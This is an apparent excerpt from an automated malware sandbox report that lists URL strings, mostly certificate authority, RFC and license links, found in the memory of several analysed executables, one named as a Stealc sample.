                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE2095F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710826085.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711018699.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digif
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net02
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                                  Source: legs.exe, 0000000A.00000003.2470897071.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2547778830.0000000005C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2788960491.000002103DA48000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764899734.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802583057.000002103DD60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2754512862.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755888861.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765037173.000002103DA44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2779956537.000002103E12C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803908439.000002103E12D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803573189.000002103E084000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787722838.000002103E025000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781952523.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778563839.000002103E128000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772329883.000002103E012000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777372598.000002103E120000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E084000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781448738.000002103E124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2557586958.0000000005AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timestamp.digicert.com0
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2803647306.000002103E0E7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2788125323.000002103D65C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2771896147.000002103D5E5000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774123095.000002103D654000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFA9000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803453745.000002103DFAB000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765366877.000002103D5E4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772439999.000002103D641000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2764899734.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785200465.000002103DA3D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802094004.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785783055.000002103DA3E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2792961287.000002103DA3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806006559.000002103E7E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2722769826.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2778242180.000002103E164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2777372598.000002103E120000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2776479073.000002103E13C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780836385.000002103E144000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2776479073.000002103E13C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780836385.000002103E144000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm;
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2776479073.000002103E13C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772007681.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780836385.000002103E144000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765290817.000002103E117000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776138025.000002103E14E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725281439.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726272957.000001FE20963000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725281439.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725281439.000001FE20962000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773203424.000002103D9A4000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772137420.000002103D99F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789395809.000002103D9B2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785730846.000002103DFB3000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780195788.000002103DFB2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784511291.000002103DFB3000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103D963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2797603763.000002103E1C6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2763762799.000002103E1A1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2804865848.000002103E1C6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776512105.000002103E1B0000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1AF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781599529.000002103E1B1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2779701716.000002103E1B0000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782413791.000002103E1C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2773693170.000002103D936000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764229732.000002103D92F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2766392868.000002103D936000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784431954.000002103D93E000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2786087781.000002103D94C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/genexpr
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2786528925.000002103DF65000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764899734.000002103DA38000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785200465.000002103DA3D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785496776.000002103DF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805687091.000002103E490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805687091.000002103E490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)01R
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710607540.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE2095D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710123489.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728754072.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2711214541.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2722942571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2710241827.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2725052406.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723493998.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715304189.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716231782.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2724122571.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2716036398.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712788714.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2728109638.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2715549124.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2723241248.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2721862733.000001FE20955000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000016.00000003.2712413838.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, gold123.exe, 0000000C.00000002.2975737593.00000000035ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.entrust.net/rpa03
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2789295969.000002103DF1D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775796167.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765175375.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787679802.000002103DF1A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2789476155.000002103DF20000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780984597.000002103E1D8000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2792583350.000002103DF33000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772137420.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764266307.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775178059.000002103DA01000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2780034567.000002103DA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2616003523.000000006C01D000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2772828637.000002103DF12000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785362407.000002103DF6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2803647306.000002103E0E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
                                  Source: stealc_valenciga.exe, 0000000B.00000002.2615822536.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_valenciga.exe, 0000000B.00000002.2608083765.0000000003800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
